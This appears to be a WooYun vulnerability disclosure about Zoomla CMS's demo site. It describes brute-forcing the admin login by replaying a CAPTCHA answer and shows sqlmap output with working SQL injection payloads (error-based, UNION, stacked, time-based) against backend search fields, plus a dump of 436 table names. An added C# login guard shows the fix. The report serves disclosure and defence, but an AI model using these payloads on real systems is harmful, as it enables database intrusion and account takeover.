WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2014-08-05: Details sent to the vendor, awaiting vendor handling
2014-08-06: Vendor confirmed; details disclosed to the vendor only
2014-08-09: Details opened to third-party security partners
2014-09-30: Details disclosed to core white hats and domain experts
2014-10-10: Details disclosed to regular white hats
2014-10-20: Details disclosed to intern white hats
2014-11-03: Details disclosed to the public
As titled.
There are two problems: 1. the CAPTCHA is poorly designed, so the backend administrator account password can be brute-forced; 2. multiple injection points in the backend (search functions) give access to all kinds of sensitive information.
#1. Flawed CAPTCHA design
Zoomla backend address: http://demo.zoomla.cn/Admin/login.aspx. At first there is no CAPTCHA, so I started brute-forcing, but then found that the page reported the CAPTCHA as wrong. After filling in the CAPTCHA, capturing that request and continuing to brute-force the password field, I found that the brute force succeeds.
Successfully logged in to the backend:
#2. Large-scale SQL injection
a. First, the search in product management:
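The CAPTCHA failure described under #1 is that a challenge, once answered, stays valid for every later request, so the attacker only has to solve it once. The following C# login guard is an added example written for this page; it is not Zoomla's code. The session id, the credential verifier passed to the constructor and the in-memory dictionaries are assumptions standing in for the real session store and user table. The point it demonstrates is that the challenge must be spent on first use (before the password is even looked at) and that the failure counter must belong to the account, not the session.

```csharp
// Added example, not Zoomla's code: a login guard where the CAPTCHA is issued per
// session, checked before the password, and spent on first use. Session ids, the
// credential verifier and the in-memory stores are assumptions for illustration.
using System;
using System.Collections.Generic;
using System.Security.Cryptography;

public enum LoginResult { Locked, CaptchaRequired, CaptchaWrong, BadCredentials, Success }

public sealed class LoginGuard
{
    private const int MaxFailuresPerAccount = 5;
    private static readonly TimeSpan LockDuration = TimeSpan.FromMinutes(15);

    // Outstanding CAPTCHA answer per session id (null once spent).
    private readonly Dictionary<string, string> _pendingCaptcha = new Dictionary<string, string>();
    // Failure counter and lock expiry per account, so opening a new session does not reset them.
    private readonly Dictionary<string, int> _failures = new Dictionary<string, int>();
    private readonly Dictionary<string, DateTime> _lockedUntil = new Dictionary<string, DateTime>();
    private readonly Func<string, string, bool> _checkCredentials; // hypothetical password verifier

    public LoginGuard(Func<string, string, bool> checkCredentials)
    {
        _checkCredentials = checkCredentials;
    }

    // Issue a fresh six-digit challenge for this session. The real page would render it
    // as an image; the answer only lives server-side and is returned here for the demo.
    public string IssueCaptcha(string sessionId)
    {
        var bytes = new byte[4];
        using (var rng = RandomNumberGenerator.Create()) rng.GetBytes(bytes);
        string answer = (BitConverter.ToUInt32(bytes, 0) % 1000000).ToString("D6");
        _pendingCaptcha[sessionId] = answer;
        return answer;
    }

    public LoginResult Attempt(string sessionId, string user, string password, string captchaInput)
    {
        DateTime until;
        if (_lockedUntil.TryGetValue(user, out until) && DateTime.UtcNow < until)
            return LoginResult.Locked;

        string expected;
        if (!_pendingCaptcha.TryGetValue(sessionId, out expected) || expected == null)
            return LoginResult.CaptchaRequired;

        // Spend the challenge before checking anything else: one answer, one attempt.
        // A captured valid answer therefore cannot be replayed across password guesses.
        _pendingCaptcha[sessionId] = null;
        if (!FixedTimeEquals(expected, captchaInput ?? string.Empty))
            return LoginResult.CaptchaWrong;

        if (!_checkCredentials(user, password))
        {
            int n;
            _failures.TryGetValue(user, out n);
            _failures[user] = ++n;
            if (n >= MaxFailuresPerAccount)
                _lockedUntil[user] = DateTime.UtcNow + LockDuration;
            return LoginResult.BadCredentials;
        }

        _failures[user] = 0;
        return LoginResult.Success;
    }

    // Constant-time comparison so the CAPTCHA check itself does not leak by timing.
    private static bool FixedTimeEquals(string a, string b)
    {
        if (a.Length != b.Length) return false;
        int diff = 0;
        for (int i = 0; i < a.Length; i++) diff |= a[i] ^ b[i];
        return diff == 0;
    }
}

public static class Demo
{
    public static void Main()
    {
        // Constructed credential store for the demo only.
        var guard = new LoginGuard((u, p) => u == "admin" && p == "correct-horse");
        string session = "sess-1";

        string captcha = guard.IssueCaptcha(session);
        Console.WriteLine(guard.Attempt(session, "admin", "guess1", captcha));
        // The same captured CAPTCHA with a new password guess is refused: it was spent above.
        Console.WriteLine(guard.Attempt(session, "admin", "guess2", captcha));
        captcha = guard.IssueCaptcha(session);
        Console.WriteLine(guard.Attempt(session, "admin", "correct-horse", captcha));
    }
}
```

Tying the counter to the account rather than the session matters because the attacker controls the session cookie; tying the CAPTCHA to the session and spending it on first use is what turns the challenge from a one-time hurdle into a per-attempt cost.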
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' AND 3515=CONVERT(INT,(SELECT CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+(SELECT (CASE WHEN (3515=3515) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113))) AND 'Cqgx'='Cqgx&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

    Type: UNION query
    Title: Generic UNION query (NULL) - 8 columns
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(115)+CHAR(104)+CHAR(108)+CHAR(113)+CHAR(120)+CHAR(81)+CHAR(83)+CHAR(66)+CHAR(119)+CHAR(87)+CHAR(74)+CHAR(73)+CHAR(100)+CHAR(89)+CHAR(113)+CHAR(107)+CHAR(112)+CHAR(98)+CHAR(113),NULL-- &ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123'; WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __VIEWSTATE=/wEPDwUKMTQ3MDI4OTY1Mw9kFgJmD2QWAgIDD2QWBmYPDxYCHghJbWFnZVVybAUbL2ltYWdlcy91c2VyZmFjZS9ub2ZhY2UuZ2lmZGQCAQ8PFgIeBFRleHQFBndvb3l1bmRkAgIPDxYCHwEFClsg5paw6am0IF1kZGS0q3/kPqTc83++8LszhAJtMNinlFqP1hhSKku0dKva3A==&ctl00$keyText=&ctl00$Content$TxtProjectName=123' WAITFOR DELAY '0:0:5'--&ctl00$Content$BtnCommit=%E6%8F%90%E4%BA%A4
---
web server operating system: Windows 8.1 or 2012 R2
web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 8.5
back-end DBMS: Microsoft SQL Server 2008
current database: 'demozoomla'
436 tables:
Database: demozoomla
[436 tables]
+-----------------------------------+
| ZL_3DMusic |
| ZL_3DPanoramic |
| ZL_3DShop |
| ZL_Accountinfo |
| ZL_AdZone |
| ZL_Adbuy |
| ZL_AddRessList |
| ZL_Advertisement |
| ZL_Agent |
| ZL_Allianceinfo |
| ZL_Answer |
| ZL_Answer_Recode |
| ZL_App |
| ZL_Arrive |
| ZL_ArticleOrders |
| ZL_ArticlePromotion |
| ZL_Ask |
| ZL_AskCommon |
| ZL_Auction |
| ZL_AuditingState |
| ZL_Author |
| ZL_Baike |
| ZL_BaikeEdit |
| ZL_Bbscate |
| ZL_Bbstips |
| ZL_BiaoQian |
| ZL_Bid |
| ZL_Bider |
| ZL_BigLog |
| ZL_BindFlolar |
| ZL_BindPro |
| ZL_BlogAnswer |
| ZL_BlogAsk |
| ZL_BlogContent |
| ZL_BlogLiving |
| ZL_BookRead |
| ZL_BossInfo |
| ZL_C_Announce |
| ZL_C_Article |
| ZL_C_Factory |
| ZL_C_FriendSite |
| ZL_C_Info |
| ZL_C_Photo |
| ZL_C_Plugins |
| ZL_C_RedirectLink |
| ZL_C_soft |
| ZL_C_video |
| ZL_CallNode |
| ZL_CallNote |
| ZL_Card |
| ZL_CardType |
| ZL_Cart |
| ZL_CartPro |
| ZL_Cash |
| ZL_ChangeProduct |
| ZL_ChangeTalk |
| ZL_Chart |
| ZL_Chat |
| ZL_Class |
| ZL_ClassRoom |
| ZL_ClientRequire |
| ZL_Client_Additional |
| ZL_Client_Basic |
| ZL_Client_Enterprise |
| ZL_Client_Penson |
| ZL_CollectionInfo |
| ZL_CollectionItem |
| ZL_Comment |
| ZL_Commodities |
| ZL_CommonModel |
| ZL_CompSecretary |
| ZL_Compete |
| ZL_CompleteHistory |
| ZL_ComponentClass |
| ZL_ComponentPlatform |
| ZL_Content_ScheTask |
| ZL_Correct |
| ZL_Count_Browser |
| ZL_Count_Iplocal |
| ZL_Count_Local |
| ZL_Count_Month |
| ZL_Count_Os |
| ZL_Count_Site |
| ZL_Count_Visitor |
| ZL_Count_Year |
| ZL_Count_dtproperties |
| ZL_Course |
| ZL_Courseware |
| ZL_CpsClick |
| ZL_CreateJS |
| ZL_CrmAuthList |
| ZL_CustomerService |
| ZL_DataList |
| ZL_DataSource |
| ZL_Datadic |
| ZL_Datadiccategory |
| ZL_Defray |
| ZL_Delivier |
| ZL_DocList |
| ZL_DocModel |
| ZL_DocPermission |
| ZL_DownServer |
| ZL_EditWord |
| ZL_EnrollList |
| ZL_ExAnswer |
| ZL_ExAttendance |
| ZL_ExChange |
| ZL_ExClassgroup |
| ZL_ExLecturer |
| ZL_ExStudent |
| ZL_ExStudytime |
| ZL_ExTeacher |
| ZL_ExamPoint |
| ZL_Exam_Class |
| ZL_Exam_Sys_Papers |
| ZL_Exam_Sys_Questions |
| ZL_Exam_Type |
| ZL_Examination |
| ZL_Examinee |
| ZL_Exroom |
| ZL_FTPConfig |
| ZL_Favorite |
| ZL_File |
| ZL_Flow |
| ZL_Frient |
| ZL_GiftCard_User |
| ZL_GiftCard_shop |
| ZL_Grade |
| ZL_GradeCate |
| ZL_Group |
| ZL_GroupBuy |
| ZL_GroupBuyList |
| ZL_GroupFieldPermissions |
| ZL_GroupModel |
| ZL_GuestAnswer |
| ZL_Guestbook |
| ZL_Guestcate |
| ZL_HidTopic |
| ZL_Hits |
| ZL_Honor |
| ZL_IDC_DBList |
| ZL_IDC_DNSSubDom |
| ZL_IDC_DNSTable |
| ZL_IDC_DomainList |
| ZL_IDC_DomainLog |
| ZL_IDC_DomainPrice |
| ZL_IDC_DomainTemp |
| ZL_IDC_Log |
| ZL_IDC_Server |
| ZL_IDC_SiteList |
| ZL_IPUrl |
| ZL_IPclass |
| ZL_IPpara |
| ZL_IServer |
| ZL_IServerReply |
| ZL_Interlocution |
| ZL_InviteRecord |
| ZL_InvtoType |
| ZL_Keyword |
| ZL_Keywords |
| ZL_LinkName |
| ZL_Log |
| ZL_MTit |
| ZL_Magazine |
| ZL_MailIdiograph |
| ZL_MailInfo |
| ZL_MailManage |
| ZL_MailReceive |
| ZL_MailSet |
| ZL_MailTemp |
| ZL_MailType |
| ZL_Manager |
| ZL_Manufacturers |
| ZL_Map |
| ZL_MbClass |
| ZL_MbComment |
| ZL_MbTheme |
| ZL_Mbtopic |
| ZL_Message |
| ZL_MiUserInfo |
| ZL_Microb |
| ZL_Mis |
| ZL_MisApproval |
| ZL_MisAttendance |
| ZL_MisInfo |
| ZL_MisPlan |
| ZL_MisProLevel |
| ZL_MisProcedure |
| ZL_MisSign |
| ZL_MisType |
| ZL_Mis_AppProg |
| ZL_Mis_Model |
| ZL_Model |
| ZL_ModelField |
| ZL_MoneyManage |
| ZL_MuClass |
| ZL_MuPage |
| ZL_MuPic |
| ZL_MuProduct |
| ZL_MuTemp |
| ZL_MultiNode |
| ZL_MySubscription |
| ZL_Node |
| ZL_NodeBindDroit |
| ZL_NodeRole |
| ZL_Node_ModelTemplate |
| ZL_OAC_111 |
| ZL_OA_BC |
| ZL_OA_Document |
| ZL_OA_FreePro |
| ZL_OA_PBTable |
| ZL_OA_Sign |
| ZL_OA_UserConfig |
| ZL_Online |
| ZL_OnlineCusServ |
| ZL_OnlineUsers |
| ZL_OrderBaseField |
| ZL_OrderDelivery |
| ZL_OrderSql |
| ZL_Order_LuckCode |
| ZL_Order_PayLog |
| ZL_Orderinfo |
| ZL_P_Shop |
| ZL_Package |
| ZL_Page |
| ZL_PageReg |
| ZL_PageStyle |
| ZL_PageTemplate |
| ZL_Page_Content |
| ZL_Page_fwefw |
| ZL_Paper_Questions |
| ZL_Papers_System |
| ZL_Papers_User |
| ZL_Passenger |
| ZL_PayPlat |
| ZL_Payment |
| ZL_Permission |
| ZL_Plan |
| ZL_PlanSql |
| ZL_PointGrounp |
| ZL_PointRecord |
| ZL_PointTrans |
| ZL_Present |
| ZL_Print |
| ZL_PrintMode |
| ZL_PrintPic |
| ZL_PrintType |
| ZL_Process |
| ZL_Processes |
| ZL_Project |
| ZL_ProjectAffairs |
| ZL_ProjectBaseField |
| ZL_ProjectCategory |
| ZL_ProjectDiscuss |
| ZL_ProjectField |
| ZL_ProjectType |
| ZL_ProjectWork |
| ZL_Projects |
| ZL_ProjectsBase |
| ZL_ProjectsComments |
| ZL_PromoCount |
| ZL_Promotion |
| ZL_Promotions |
| ZL_Pub |
| ZL_Pub_TW |
| ZL_Pub_WTHD |
| ZL_Pub_WZTP |
| ZL_Pub_ZJDA |
| ZL_Pub_ZXDC |
| ZL_Pub_huodong |
| ZL_QrCode |
| ZL_Question |
| ZL_Questions |
| ZL_Questions_Class |
| ZL_Questions_Knowledge |
| ZL_Questions_Type |
| ZL_Questions_User |
| ZL_RebateOrder |
| ZL_Rebates |
| ZL_Recruitment |
| ZL_RedEnvelope |
| ZL_Redindulgence |
| ZL_Reg_Page |
| ZL_Regsterapi |
| ZL_Result |
| ZL_Role |
| ZL_RolePermissions |
| ZL_RoomActive |
| ZL_RoomActiveJoin |
| ZL_RoomCall |
| ZL_RoomInfo |
| ZL_RoomMessage |
| ZL_RoomNotify |
| ZL_RoomUpFile |
| ZL_RoomUser |
| ZL_SQL |
| ZL_S_FloGoods |
| ZL_S_FloPack |
| ZL_S_shop |
| ZL_Scheme |
| ZL_SchemeInfo |
| ZL_School |
| ZL_ScoreStatics |
| ZL_Search |
| ZL_Sensitivity |
| ZL_ServiceSeat |
| ZL_SettlementInfoList |
| ZL_ShopCommentary |
| ZL_ShopCompete |
| ZL_ShopGrade |
| ZL_ShopLable |
| ZL_ShopNodeinfo |
| ZL_Shopconfig |
| ZL_Shopsearch |
| ZL_Shopsite |
| ZL_ShopsiteClass |
| ZL_SitePas |
| ZL_SitePicAdv |
| ZL_SiteTextAdv |
| ZL_Sns_Active |
| ZL_Sns_ActiveJoin |
| ZL_Sns_ActivePic |
| ZL_Sns_ActiveType |
| ZL_Sns_BlogStyleTable |
| ZL_Sns_BookTable |
| ZL_Sns_CarConfig |
| ZL_Sns_CarLog |
| ZL_Sns_Carlist |
| ZL_Sns_ChatLog |
| ZL_Sns_CollectTable |
| ZL_Sns_CommendCommentOn |
| ZL_Sns_CommentAll |
| ZL_Sns_FileShare |
| ZL_Sns_GSHuatee |
| ZL_Sns_GSReverCricicism |
| ZL_Sns_GSRoom |
| ZL_Sns_GSType |
| ZL_Sns_GatherStrain |
| ZL_Sns_GroupPicCateg |
| ZL_Sns_HomeCollocate |
| ZL_Sns_HomeHeadCollocate |
| ZL_Sns_Kiss |
| ZL_Sns_Log |
| ZL_Sns_LogCriticism |
| ZL_Sns_LookLog |
| ZL_Sns_LotMessage |
| ZL_Sns_LotNote |
| ZL_Sns_Memo |
| ZL_Sns_Messageboard |
| ZL_Sns_MyCar |
| ZL_Sns_MyPose |
| ZL_Sns_PicCateg |
| ZL_Sns_PicCritique |
| ZL_Sns_PicTure |
| ZL_Sns_ProductTable |
| ZL_Sns_ProductTypetable |
| ZL_Sns_ReplayLog |
| ZL_Sns_Report |
| ZL_Sns_SystemBannerTable |
| ZL_Sns_SystemLog |
| ZL_Sns_UserLog |
| ZL_Sns_UserLogType |
| ZL_Sns_UserMoreinfo |
| ZL_Sns_UserShopProduct |
| ZL_Sns_User_R_GS |
| ZL_Sns_User_R_Module |
| ZL_Sns_blogTable |
| ZL_Source |
| ZL_SpecCate |
| ZL_SpecInfo |
| ZL_Special |
| ZL_Stock |
| ZL_StoreStyleTable |
| ZL_Store_reg |
| ZL_Structure |
| ZL_Student |
| ZL_SubscriptionCount |
| ZL_Survey |
| ZL_Trademark |
| ZL_UAgent |
| ZL_U_comp |
| ZL_U_jl |
| ZL_U_zp |
| ZL_Ucenter |
| ZL_UnionInfo |
| ZL_User |
| ZL_UserApp |
| ZL_UserBase |
| ZL_UserBaseField |
| ZL_UserCaritHis |
| ZL_UserCart |
| ZL_UserCartPro |
| ZL_UserClass |
| ZL_UserCoinHis |
| ZL_UserCourse |
| ZL_UserDay |
| ZL_UserExpDomP |
| ZL_UserExpHis |
| ZL_UserFave |
| ZL_UserFriendGroup |
| ZL_UserFriendTable |
| ZL_UserGrade |
| ZL_UserGroup |
| ZL_UserOrderinfo |
| ZL_UserPromotions |
| ZL_UserPurview |
| ZL_UserRecei |
| ZL_UserRegisterIP |
| ZL_UserRoom |
| ZL_UserShop |
| ZL_UserStock |
| ZL_UserStoreTable |
| ZL_UserStoreTypeTable |
| ZL_VJobInfo |
| ZL_VResume |
| ZL_VRoom |
| ZL_VideoHall |
| ZL_VideoHouse |
| ZL_VideoHouseApply |
| ZL_VideoInfo |
| ZL_VideoMessage |
| ZL_VideoRoom |
| ZL_VideoUser |
| ZL_VideoUserFriend |
| ZL_VideoUserGroup |
| ZL_View |
| ZL_ViewHistory |
| ZL_WapArticle |
| ZL_WorkRole |
| ZL_Zone_Advertisement |
| ZL_Zone_Node |
| ZL_Zone_Site |
| ZL_Zone_question |
| ZL_page_app |
| ZL_wxMsg |
| demozoomla_f.ZL_Content_WordChain |
+-----------------------------------+
b. The visitor review search:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: (custom) POST
Parameter: #1*
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
[__VIEWSTATE value omitted]
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' AND 2825=CONVERT(INT,(SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+(SELECT (CASE WHEN (2825=2825) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113))) AND '%'='
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--

    Type: UNION query
    Title: Generic UNION query (NULL) - 9 columns
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
[__VIEWSTATE value omitted]
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%' UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(121)+CHAR(105)+CHAR(113)+CHAR(100)+CHAR(87)+CHAR(122)+CHAR(70)+CHAR(88)+CHAR(112)+CHAR(69)+CHAR(101)+CHAR(77)+CHAR(72)+CHAR(113)+CHAR(117)+CHAR(121)+CHAR(105)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- 
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl06"
10
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$Egv$ctl13$ctl07"
1
------WebKitFormBoundary5n6dB9dFzpkAYygr--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: ------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTTARGET"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__EVENTARGUMENT"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__LASTFOCUS"

------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="__VIEWSTATE"
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
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTitle"
123456%'; WAITFOR DELAY '0:0:5'--
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$txtTime"
2014-08
------WebKitFormBoundary5n6dB9dFzpkAYygr
Content-Disposition: form-data; name="ctl00$Content$btnSeach"
??��������
------WebKitFormBoundary5n6dB9dFzpkAYygr
